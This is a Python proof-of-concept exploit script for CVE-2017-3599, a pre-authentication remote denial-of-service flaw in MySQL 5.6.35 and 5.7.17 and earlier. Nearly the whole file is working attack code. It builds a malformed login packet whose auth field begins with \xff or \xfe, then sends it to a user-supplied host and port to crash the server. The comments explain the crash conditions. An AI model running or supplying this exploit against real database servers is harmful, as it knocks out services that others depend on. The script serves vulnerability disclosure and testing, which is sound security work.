'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''
import socket
import sys
from struct import pack
'''
CVE-2017-3599 Proof of Concept exploit code.
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
Rodrigo Marcos
'''
if len(sys.argv)<2:
	print "Usage: python " + sys.argv[0] + " host [port]"
	exit(0)
else:
	HOST = sys.argv[1]
	if len(sys.argv)>2:
		PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
	else:
		PORT = 3306
print "[+] Creating packet..."
'''
3 bytes		Packet lenth
1 bytes 	Packet number
Login request:
Packet format (when the server is 4.1 or newer):
Bytes       Content
-----       ----
4           client capabilities
4           max packet size
1           charset number
23          reserved (always 0)
n           user name, \0-terminated
n           plugin auth data (e.g. scramble), length encoded
n           database name, \0-terminated
            (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n           client auth plugin name - \0-terminated string,
            (if CLIENT_PLUGIN_AUTH is set in the capabilities)
'''
# packet_len = '\x64\x00\x00'
packet_num = '\x01'
#Login request packet
packet_cap = '\x85\xa2\xbf\x01'		# client capabilities (default)
packet_max = '\x00\x00\x00\x01'		# max packet size (default)
packet_cset = '\x21'				# charset (default)
p_reserved = '\x00' * 23 			# 23 bytes reserved with nulls (default)
packet_usr =  'test\x00' 			# username null terminated (default)
packet_auth  = '\xff'			# both \xff and \xfe crash the server
'''
Conditions to crash:
1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars
The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''
packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('i',len(packet))[:3]
request = packet_len + packet_num + packet
print "[+] Connecting to host..."
try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))
	print "[+] Connected."
except:
	print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
	s.close()
	print "[+] Exiting."
	exit(0)
print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."
print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request
s.close()